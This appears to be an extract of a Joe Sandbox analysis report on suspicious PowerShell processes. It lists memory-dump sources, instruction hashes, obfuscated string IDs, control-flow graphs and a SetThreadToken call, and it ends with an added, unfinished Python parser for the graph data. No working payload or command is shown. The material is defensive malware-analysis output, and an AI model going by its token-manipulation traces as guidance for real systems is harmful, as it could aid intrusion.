                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 8f7947be825300b7487a019884797a67621759d36b70ffd4c45960aafcc06800
                                                                                                                                                                        • Instruction ID: c24afb3706d5d0976a89d014676c90424abbcd4169cd829d9386c316302f424d
                                                                                                                                                                        • Opcode Fuzzy Hash: 8f7947be825300b7487a019884797a67621759d36b70ffd4c45960aafcc06800
                                                                                                                                                                        • Instruction Fuzzy Hash: 81D0A97104E3C88FC30B1B7098380503FB8EE8311930A0CCAE0CA4F2B3C921A849DB62
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a73c3b22a4c7fa1f9d7959fb192b347dcc119af432123fb11a9850db51bacf3b
                                                                                                                                                                        • Instruction ID: 13800e422f3a3f2c189db841016c986abbe84b20f7f1c19dbb2c6b025e70bc37
                                                                                                                                                                        • Opcode Fuzzy Hash: a73c3b22a4c7fa1f9d7959fb192b347dcc119af432123fb11a9850db51bacf3b
                                                                                                                                                                        • Instruction Fuzzy Hash: 4AC002165293D04FFB02833508B61663FB1D98752470A8DD2D9818B177C8149816E351
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a416b10b7fb75902150b50d09fb98a9b1a1be6c95b628f6283c0e43c59bf8be5
                                                                                                                                                                        • Instruction ID: 1b53e095cde924258609f454b5a0fa591aa773f0a33e83364f19ecd6d44064c5
                                                                                                                                                                        • Opcode Fuzzy Hash: a416b10b7fb75902150b50d09fb98a9b1a1be6c95b628f6283c0e43c59bf8be5
                                                                                                                                                                        • Instruction Fuzzy Hash: 92B09271044709CFC2496FB5E418814732DBF8021978008A8E91E1A6928E36E889CA85
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1812765516.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_71f0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: $cqk$4'^q$4'^q$4'^q$4'^q$84|l$84|l$piFk$tP^q$tP^q$r~l$r~l
                                                                                                                                                                        • API String ID: 0-2175947571
                                                                                                                                                                        • Opcode ID: 49b0b35238f6699e09fa51fdc513c2e8479bc883e3bdad25d8b162cb3d8dc4c6
                                                                                                                                                                        • Instruction ID: 5a570557a988359457e3818536441d3465d912b5c6291bdd77dd08759bb5a949
                                                                                                                                                                        • Opcode Fuzzy Hash: 49b0b35238f6699e09fa51fdc513c2e8479bc883e3bdad25d8b162cb3d8dc4c6
                                                                                                                                                                        • Instruction Fuzzy Hash: 88D13CB2B0431ADFCB169B6994046AABBF2AFC6311F1484ABD615CF2D1DB31C885C791
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1812765516.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_71f0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q$tl$tl
                                                                                                                                                                        • API String ID: 0-750435783
                                                                                                                                                                        • Opcode ID: e8c1a19b3debaa63e3420fc066fabc077cec30a8293f826b7dcf066b5d943e71
                                                                                                                                                                        • Instruction ID: 589067a717c7d40ad94c561ede1bd53fe443c34c7c0d9157fc12aa35bfa78c04
                                                                                                                                                                        • Opcode Fuzzy Hash: e8c1a19b3debaa63e3420fc066fabc077cec30a8293f826b7dcf066b5d943e71
                                                                                                                                                                        • Instruction Fuzzy Hash: CA517DF27043069FCB2A5A698402776BBE2AFC6721F14817BD625CB2D1DF35C881C7A1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: tM~l$`_q$`_q$`_q$`_q
                                                                                                                                                                        • API String ID: 0-4175844202
                                                                                                                                                                        • Opcode ID: c861a1b20cf27ba012e6e065879a54a74b2d0fc54288c5f15c5671577508fc88
                                                                                                                                                                        • Instruction ID: 45cdc7c17afd2ed247158689de529b81a362f80f4284b72a2dfaa9d5e0f697fe
                                                                                                                                                                        • Opcode Fuzzy Hash: c861a1b20cf27ba012e6e065879a54a74b2d0fc54288c5f15c5671577508fc88
                                                                                                                                                                        • Instruction Fuzzy Hash: EDB18374E002199FCB55DFA9D990A9DFBF2FF88300F108669E819AB315DB30A945CF90
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: tM~l$`_q$`_q$`_q$`_q
                                                                                                                                                                        • API String ID: 0-4175844202
                                                                                                                                                                        • Opcode ID: c37ad440c8c3a784fc43cacfa9bb725aaed5eb8f344452a0862604f1be5b244c
                                                                                                                                                                        • Instruction ID: 328b2b3e924e5549a5bcfd6057b215e0de138f273f124986d94704a8b4deda38
                                                                                                                                                                        • Opcode Fuzzy Hash: c37ad440c8c3a784fc43cacfa9bb725aaed5eb8f344452a0862604f1be5b244c
                                                                                                                                                                        • Instruction Fuzzy Hash: D3B16374E002199FDB54DFA9D990A9DFBF2FF88300F108629E819AB355DB70A945CF90
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: tM~l$`_q$`_q$`_q$`_q
                                                                                                                                                                        • API String ID: 0-4175844202
                                                                                                                                                                        • Opcode ID: d944c960f14bf54f4c255433b2cbd1ebf03a6e29cb214f98d1e1108ff9bf3fa3
                                                                                                                                                                        • Instruction ID: fd42d412edcf2f8240e499c7bfbdb697f63a78be6e7ac149689d1f130b8b36a2
                                                                                                                                                                        • Opcode Fuzzy Hash: d944c960f14bf54f4c255433b2cbd1ebf03a6e29cb214f98d1e1108ff9bf3fa3
                                                                                                                                                                        • Instruction Fuzzy Hash: 0FA16074E012199FDB54DFA9D990A9DFBF2FF48300F208629E819AB315DB30A945CF90
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1812765516.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_71f0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                        • API String ID: 0-1420252700
                                                                                                                                                                        • Opcode ID: 658e2e6dfcfc9ea4773b212ede7a7cdba5812f33d9682c7c5e485c0c7995346e
                                                                                                                                                                        • Instruction ID: 1b78803855f9fd9b9073d4d585d589d846e7fabdca412a770c9233fc58b05606
                                                                                                                                                                        • Opcode Fuzzy Hash: 658e2e6dfcfc9ea4773b212ede7a7cdba5812f33d9682c7c5e485c0c7995346e
                                                                                                                                                                        • Instruction Fuzzy Hash: 49D179F27042958FCB168A6888117BB7BA2AFD5311F14847AEA45CF3D1DF31D982C7A1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1812765516.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_71f0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                        • API String ID: 0-2125118731
                                                                                                                                                                        • Opcode ID: a8d7eb2bae73d904e0447d0a8d3b11d6bada559a9fd2a0cac3179d126e7b6150
                                                                                                                                                                        • Instruction ID: f8b9d81bd0ff4c269748e02df559ecafca7ca4dd8baacef2d8c5da4c0da2e439
                                                                                                                                                                        • Opcode Fuzzy Hash: a8d7eb2bae73d904e0447d0a8d3b11d6bada559a9fd2a0cac3179d126e7b6150
                                                                                                                                                                        • Instruction Fuzzy Hash: 1D2129B27103069BDB28597B8802B27BBD75BC4712F64842AE709CF2C5DF75D851C361
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1812765516.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_71f0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                        • API String ID: 0-2049395529
                                                                                                                                                                        • Opcode ID: e9b1b78ac30c87b6ec59dc7f16725cf19aa6a8d5dcb51cf8aa754a2d027e6aa6
                                                                                                                                                                        • Instruction ID: e8293a3881b6e1a43b4b03667dba75add7b582947bf321b84280eaaf8159b2f4
                                                                                                                                                                        • Opcode Fuzzy Hash: e9b1b78ac30c87b6ec59dc7f16725cf19aa6a8d5dcb51cf8aa754a2d027e6aa6
                                                                                                                                                                        • Instruction Fuzzy Hash: 9201A2A270D3A64FC72B126819201A56FB25F8B61071A44DBC581DF3D7CE244D4983B7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1896825801.000000000276D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0276D000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_276d000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 6e00abbad76000fcb8afa54b07c25ea0ce4c0cf193ece4453288184dfebb9137
                                                                                                                                                                        • Instruction ID: 7f042774b5a83f509f31252ce7d3abd35a2adbe3c90d859c2da097ff5c600539
                                                                                                                                                                        • Opcode Fuzzy Hash: 6e00abbad76000fcb8afa54b07c25ea0ce4c0cf193ece4453288184dfebb9137
                                                                                                                                                                        • Instruction Fuzzy Hash: 1A01F2712093409AE7308A29CC88B76BFD8DF91325F18C41AEC491B282C7799845C6B1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1896825801.000000000276D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0276D000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_276d000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9ec3233711b64886e01a85890769f0cfa5c665368a8ba336bcb83fe230195e8e
                                                                                                                                                                        • Instruction ID: 299509085cbaa3c1b1ab1c5bcf4ba859f1381efcc066151c43cc6646d452e113
                                                                                                                                                                        • Opcode Fuzzy Hash: 9ec3233711b64886e01a85890769f0cfa5c665368a8ba336bcb83fe230195e8e
                                                                                                                                                                        • Instruction Fuzzy Hash: 9B01527110E3C05ED7228B258C98B62BFB4DF53224F1D81CBDC888F1A3C2695845C772
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1899493352.0000000004160000.00000040.00000800.00020000.00000000.sdmp, Offset: 04160000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_4160000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9a5f6e0184816c57f27001754c7d2cb4abedd82d7045af7d6e64f9cc38909987
                                                                                                                                                                        • Instruction ID: d428f578665b155a8c60618a2f187df5c4ad79988aca37302b820d1245a4513d
                                                                                                                                                                        • Opcode Fuzzy Hash: 9a5f6e0184816c57f27001754c7d2cb4abedd82d7045af7d6e64f9cc38909987
                                                                                                                                                                        • Instruction Fuzzy Hash: CFF0DA35A001059FCB15CF9DD890AEEF7B1FF88324F248199E515A72A1C736EC52CB50

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:6%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                        Total number of Nodes:3
                                                                                                                                                                        Total number of Limit Nodes:0
execution_graph (nodes and edges):
• Node 21210: 8c06658
• Node 21211: 8c0669b SetThreadToken
• Node 21212: 8c066c9
• Edges: 21210->21211, 21211->21212

                                                                                                                                                                        Control-flow Graph

control_flow_graph (basic blocks and edges):
• Block 389: 339b490-339b4b9
• Block 390: 339b4bb
• Block 391: 339b4be-339b7f9 call 339aab4
• Block 452: 339b7fe-339b805
• Edges: 389->390, 389->391, 390->391, 391->452
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: kUxo^${Uxo^$[xo^
                                                                                                                                                                        • API String ID: 0-1768236392
                                                                                                                                                                        • Opcode ID: 663b17bb0b5af5c20492bcb1a9e9c8de2e40fb2d744db738713b5ecd5d30778b
                                                                                                                                                                        • Instruction ID: 473fb1cacf7d5d58a67db2bc79364449eb91beec776588c06f903edade3428a2
                                                                                                                                                                        • Opcode Fuzzy Hash: 663b17bb0b5af5c20492bcb1a9e9c8de2e40fb2d744db738713b5ecd5d30778b
                                                                                                                                                                        • Instruction Fuzzy Hash: 70917C75B007189BDB1AEFB4C4146AEB7E2EF84604B00891DD10AAF340DF786D0A8BD6

                                                                                                                                                                        Control-flow Graph

control_flow_graph (basic blocks and edges):
• Block 453: 339b4a0-339b4b9
• Block 454: 339b4bb
• Block 455: 339b4be-339b7f9 call 339aab4
• Block 516: 339b7fe-339b805
• Edges: 453->454, 453->455, 454->455, 455->516
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: kUxo^${Uxo^$[xo^
                                                                                                                                                                        • API String ID: 0-1768236392
                                                                                                                                                                        • Opcode ID: 931185a7ee67cbd0a42e6fd4b49dddf15fc4efec5fc38eac7fd927c8ab271279
                                                                                                                                                                        • Instruction ID: 5409aea465ad57c565e183d3c321c2397869bb88bf6cc967bf4a543ed9350518
                                                                                                                                                                        • Opcode Fuzzy Hash: 931185a7ee67cbd0a42e6fd4b49dddf15fc4efec5fc38eac7fd927c8ab271279
                                                                                                                                                                        • Instruction Fuzzy Hash: D0915D75B007199BDB1AEFB4C4146AEB7E2EFC4604B00891DD11AAF340DF786D0A8BD6
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1889936093.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7910000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$piFk$piFk$piFk$piFk$piFk$|,Hk$r~l$r~l
• API String ID: 0-2495246005
• Opcode ID: c53412430e37820d28c96a557c586851b655e47d054dd5b8fcecd23773d98110
• Instruction ID: a38fd06a589cea7fa6e89e145981c429389365322665080f9de74a3d9e016494
• Opcode Fuzzy Hash: c53412430e37820d28c96a557c586851b655e47d054dd5b8fcecd23773d98110
• Instruction Fuzzy Hash: 212237B1B0020ECFCB14AF68C5417AABBE6BF89315F14847AD919CB681DB31DC65C7A1

Control-flow Graph: function at 7913ce8 (graph data omitted)
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1889936093.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7910000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$4'^q$4'^q$W
• API String ID: 0-557959733
• Opcode ID: a33d4ba284401b5be8a7c55dcf3d338138b1a8b440282e61c80544256bf68d8e
• Instruction ID: 0b4cf25b18f1c5f5e72158ac8a318de6acea1423ddee3cde4c76a36331385a9d
• Opcode Fuzzy Hash: a33d4ba284401b5be8a7c55dcf3d338138b1a8b440282e61c80544256bf68d8e
• Instruction Fuzzy Hash: D61297F2B0034A8FCB148B68C90176ABBB69FD9319F1484BAD505CF291DB31DC66C7A1

Control-flow Graph: function at 8c06652, calls SetThreadToken (graph data omitted)
APIs
Memory Dump Source
• Source File: 0000000B.00000002.1895242350.0000000008C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_8c00000_powershell.jbxd
Similarity
• API ID: ThreadToken
• String ID:
• API String ID: 3254676861-0
• Opcode ID: a05ea405d956af5331927bc80f84cbf2d15edc5c95ebe48be822882af1218920
• Instruction ID: 9af29d0e057484a65af1a3a5ddcc0c653123ee3ae85ecf06d920252ab8cc0626
• Opcode Fuzzy Hash: a05ea405d956af5331927bc80f84cbf2d15edc5c95ebe48be822882af1218920
• Instruction Fuzzy Hash: 591113B5D003498FCB10DF9AC984B9EFBF4EF88324F24845AD469A7250C774A944CFA4

Control-flow Graph: function at 8c06658, calls SetThreadToken (graph data omitted)
APIs
Memory Dump Source
• Source File: 0000000B.00000002.1895242350.0000000008C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_8c00000_powershell.jbxd
Similarity
• API ID: ThreadToken
• String ID:
• API String ID: 3254676861-0
• Opcode ID: 8c990110a66aacbc91b7f640985aaabce48bc33583169a32da03a92135e64a83
• Instruction ID: 28647f04db6dca7cadecb760e0c3c6a0167c8b5fc81e5211a9c891015aca9401
• Opcode Fuzzy Hash: 8c990110a66aacbc91b7f640985aaabce48bc33583169a32da03a92135e64a83
• Instruction Fuzzy Hash: AC11F2B5D003088FCB10DF9AC885B9EFBF8EB88324F24841AD559A7350C774A944CFA5

Control-flow Graph: function at 3396fe0, calls 339767c, 3397697 and 339bf20 (graph data omitted)
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID: (bq
• API String ID: 0-149360118
• Opcode ID: fbe7231e8215b19e3db2c5ba17372826c1a085135ae4526d5b1fb3961acda96b
• Instruction ID: b4e32518a397e9b47343d076e433863a97bd1440386a19cdf0c5c2701334a0f8
• Opcode Fuzzy Hash: fbe7231e8215b19e3db2c5ba17372826c1a085135ae4526d5b1fb3961acda96b
• Instruction Fuzzy Hash: 99413C34B14205CFDB18DB69C498AAEBBF6EF8D715F1944A9D406AB391CB35DC01CB60

Control-flow Graph: function at 339afa8, calls 339a79c (graph data omitted)
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID: (&^q
• API String ID: 0-2067289071
• Opcode ID: f2a99950cff8425fedb29d5d57711fd67aab01ebbc8d5dda6cc8a3c26682eab5
• Instruction ID: e1b68ff294e16c95f4bee05dbba5fbc3e13a15e55284948c42ef065a1f870471
• Opcode Fuzzy Hash: f2a99950cff8425fedb29d5d57711fd67aab01ebbc8d5dda6cc8a3c26682eab5
• Instruction Fuzzy Hash: 1F219F75A043188FDB14DBAED844BAEBBF5EB89320F14846AD119A7340CA74A805CBA5

Control-flow Graph: function at 33929f0 (graph data omitted)
Memory Dump Source
• Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 71bbdffc3a9d568ca69ce400109a871748f7485d10899a33a4bddb4b7fb3d00d
• Instruction ID: d95f5445fd4cff6b98eadf3d6f3e71af7fc154aed62ef122fb5a96955af114b4
• Opcode Fuzzy Hash: 71bbdffc3a9d568ca69ce400109a871748f7485d10899a33a4bddb4b7fb3d00d
• Instruction Fuzzy Hash: 69914874A00649DFCB15CF58C8D49AAFBB1FF48310B28899AD915EB365C736EC51CBA0

Control-flow Graph
(The graph is an image in the original, with an "Executed / Not Executed" colour legend that does not survive extraction. The edge list below is the graph's own data: block number, address range, call target if any, and successor blocks.)
• 867: 3397740-3397776 -> 870, 871
• 870: 3397778-339777a -> 872
• 871: 339777f-3397788 -> 874, 875
• 872: 3397829-339782e (no successors)
• 874: 339778a-339778c -> 872
• 875: 3397791-33977af -> 878, 879
• 878: 33977b1-33977b3 -> 872
• 879: 33977b5-33977b9 -> 880, 881
• 880: 33977c8-33977cf -> 882, 883
• 881: 33977bb-33977c0 -> 880
• 882: 339782f-3397860 -> 893, 894
• 883: 33977d1-33977fa -> 886, 887
• 886: 3397808 -> 889
• 887: 33977fc-3397806 -> 889
• 889: 339780a-3397816 -> 895, 896
• 893: 33978e2-33978e6 -> 907, 908
• 894: 3397866-33978bd -> 903, 904
• 895: 3397818-339781a -> 872
• 896: 339781c-3397823 -> 872
• 898: 33978ec-33978f1 (no successors)
• 903: 33978c9-33978d7 -> 893, 906
• 904: 33978bf -> 903
• 906: 33978d9-33978e1 (no successors)
• 907: 33978e9, call 3397940 -> 898
• 908: 33978e9, call 3397932 -> 898
Memory Dump Source
• Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 89b02770fbe2eff998a7b2ed1311dda417b34ead60c6b9e294da0bd1d13b5570
• Instruction ID: 5413156b11979c792c15f47f2234235485ddadad99c5201f0c6afe5250769fc6
• Opcode Fuzzy Hash: 89b02770fbe2eff998a7b2ed1311dda417b34ead60c6b9e294da0bd1d13b5570
• Instruction Fuzzy Hash: 5751D435314205DFEB14DB79DC84A2A77EAFFC9216B1888AAE509CB391DB35DC01C790

Control-flow Graph
(Image in the original, with the same "Executed / Not Executed" legend; edge list recovered from the graph data: block number, address range, call target if any, and successor blocks.)
• 909: 339bad0-339bb60 -> 913, 914
• 913: 339bb62 -> 914
• 914: 339bb66-339bb71 -> 915, 916
• 915: 339bb73 -> 916
• 916: 339bb76-339bbd0, call 339afa8 -> 923, 924
• 923: 339bc21-339bc25 -> 925, 926
• 924: 339bbd2-339bbd7 -> 923, 927
• 925: 339bc27-339bc31 -> 926
• 926: 339bc36 -> 928
• 927: 339bbd9-339bbfc -> 929
• 928: 339bc3b-339bc3d -> 930, 931
• 929: 339bc02-339bc0d -> 932, 933
• 930: 339bc3f-339bc60 -> 935
• 931: 339bc62-339bc65, call 339a790 -> 935
• 932: 339bc0f-339bc15 -> 933
• 933: 339bc16-339bc1f -> 928
• 935: 339bc6a-339bc6e -> 938, 939
• 938: 339bc70-339bc99 -> 939
• 939: 339bca7-339bcd6 (no successors)
Memory Dump Source
• Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9f1f6401a7c385a4267e518ec760c27c0ce4311deda48907af9b71d5cc234c04
• Instruction ID: b493b67bf96b6d5e1c907ffc31b8e40407dec6faa21efd39e9b22286b545e44b
• Opcode Fuzzy Hash: 9f1f6401a7c385a4267e518ec760c27c0ce4311deda48907af9b71d5cc234c04
• Instruction Fuzzy Hash: 42610275E00208DFDB14DFA9D884A9DFBF5EF88310F19812AE819AB254DB70AC41CF60
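The report serializes each control-flow graph as a flat token stream (`control_flow_graph <block> <start>[-<end>] [call <target>] ... <src>-><dst> ...`), which is what the graph widget renders. The following is an added example and not part of the Joe Sandbox report or its IDA plugin: a Python parser for that serialization that recovers the basic blocks, their successors, the exit blocks and the call targets, and checks that every block is reachable from the entry. The two graph strings are copied from this report (the functions at 0x3397740 and 0x339bad0 in the 0x3390000 dump of process 11). The token layout, and the assumption that the lowest-address block is the function entry, are inferred from those two strings rather than taken from any Joe Sandbox documentation.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# The two graph serializations copied from this report (functions at 0x3397740 and 0x339bad0).
CFG_3397740 = (
    "control_flow_graph 867 3397740-3397776 870 3397778-339777a 867->870 871 339777f-3397788 867->871 "
    "872 3397829-339782e 870->872 874 339778a-339778c 871->874 875 3397791-33977af 871->875 874->872 "
    "878 33977b1-33977b3 875->878 879 33977b5-33977b9 875->879 878->872 880 33977c8-33977cf 879->880 "
    "881 33977bb-33977c0 879->881 882 339782f-3397860 880->882 883 33977d1-33977fa 880->883 881->880 "
    "893 33978e2-33978e6 882->893 894 3397866-33978bd 882->894 886 3397808 883->886 887 33977fc-3397806 "
    "883->887 889 339780a-3397816 886->889 887->889 895 3397818-339781a 889->895 896 339781c-3397823 "
    "889->896 907 33978e9 call 3397940 893->907 908 33978e9 call 3397932 893->908 903 33978c9-33978d7 "
    "894->903 904 33978bf 894->904 895->872 896->872 898 33978ec-33978f1 903->893 906 33978d9-33978e1 "
    "903->906 904->903 907->898 908->898"
)
CFG_339BAD0 = (
    "control_flow_graph 909 339bad0-339bb60 913 339bb62 909->913 914 339bb66-339bb71 909->914 913->914 "
    "915 339bb73 914->915 916 339bb76-339bbd0 call 339afa8 914->916 915->916 923 339bc21-339bc25 "
    "916->923 924 339bbd2-339bbd7 916->924 925 339bc27-339bc31 923->925 926 339bc36 923->926 924->923 "
    "927 339bbd9-339bbfc 924->927 925->926 928 339bc3b-339bc3d 926->928 929 339bc02-339bc0d 927->929 "
    "930 339bc3f-339bc60 928->930 931 339bc62-339bc65 call 339a790 928->931 932 339bc0f-339bc15 "
    "929->932 933 339bc16-339bc1f 929->933 935 339bc6a-339bc6e 930->935 931->935 932->933 933->928 "
    "938 339bc70-339bc99 935->938 939 339bca7-339bcd6 935->939 938->939"
)


@dataclass
class Block:
    ident: int                  # node number used by the graph
    start: int                  # first instruction address
    end: int                    # last instruction address (== start for one-instruction blocks)
    call: Optional[int] = None  # address called from this block, if any
    succ: List[int] = field(default_factory=list)


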